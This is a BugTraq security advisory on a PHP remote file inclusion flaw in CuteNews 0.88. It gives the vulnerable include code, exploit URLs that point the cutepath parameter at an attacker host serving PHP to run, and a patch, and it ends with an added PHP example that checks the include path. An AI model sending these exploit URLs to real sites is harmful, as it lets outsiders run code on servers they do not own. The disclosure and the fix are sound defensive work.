BugTraq
PHP code injection in CuteNews
Feb 25 2003 11:31AM
Over_G (overg mail ru)
PHP source code injection in CuteNews
Information :
===============================================
Script : CuteNews v0.88
Official site : http://air.langame.net/
===============================================
PHP Scripts :
===============================================
shownews.php :
if(!$cutepath) $cutepath=".";
require_once("$cutepath/config.php");
{.........}
$all_news=file("$cutepath/news.txt");
===============================================
search.php :
require_once("$cutepath/config.php");
===============================================
comments.php :
if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
===============================================
Exploits :
http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/
with :
http://[ATTACKER]/config.php
http://[ATTACKER]/news.txt
Content of config.php or news.txt:
Any PHP Code.
===============================================
Patch :
Replace
if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
with $cutepath=".";
===============================================
Best Regards, Over_G [DWC Gr0up] and VenoM
Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org
Mail: OverG (at) mail (dot) ru [email concealed] VenoM88 (at) mail (dot) ru [email concealed]
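
A hardened form of the include shown in the advisory, as an added example that is not part of the original post or of CuteNews: the script chooses the base directory itself and checks that it is a local directory under the install root before loading config.php and news.txt. The function name resolve_cutepath, the temporary sandbox directory and the attacker.invalid host are assumptions made for illustration.

```php
<?php
// Added example, not CuteNews code. resolve_cutepath() and the sandbox are assumptions.

// Return $candidate as a local directory under $root, or throw. Refuses stream
// wrappers (http://, ftp://, php://), NUL bytes and paths that leave $root.
function resolve_cutepath(string $candidate, string $root): string
{
    if (strpos($candidate, '://') !== false || strpos($candidate, "\0") !== false) {
        throw new InvalidArgumentException('stream wrapper or NUL byte');
    }
    $root = realpath($root);
    $real = $root === false ? false : realpath($root . DIRECTORY_SEPARATOR . $candidate);
    if ($real === false || !is_dir($real)) {
        throw new InvalidArgumentException('not a local directory');
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($real !== $root && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        throw new InvalidArgumentException('outside the install directory');
    }
    return $real;
}

// Constructed sandbox standing in for the cutenews/ directory.
$install = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cutenews_demo_' . uniqid();
mkdir($install, 0700);
file_put_contents("$install/config.php", '<?php $config_ok = true;');
file_put_contents("$install/news.txt", "1|constructed sample entry\n");

// Constructed candidate values: the default, a remote URL, a parent directory.
foreach (['.', 'http://attacker.invalid/', '..'] as $candidate) {
    try {
        echo "allow  '$candidate' -> ", resolve_cutepath($candidate, $install), "\n";
    } catch (InvalidArgumentException $e) {
        echo "reject '$candidate' (", $e->getMessage(), ")\n";
    }
}

// The script picks the value itself; nothing from the request reaches it.
$cutepath = resolve_cutepath('.', $install);   // in a deployed script: __DIR__
require_once "$cutepath/config.php";
$all_news = file("$cutepath/news.txt");
echo 'config loaded: ', var_export($config_ok, true), ', news lines: ', count($all_news), "\n";

// Remove the sandbox.
unlink("$install/config.php");
unlink("$install/news.txt");
rmdir($install);
```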
Copyright 2009, SecurityFocus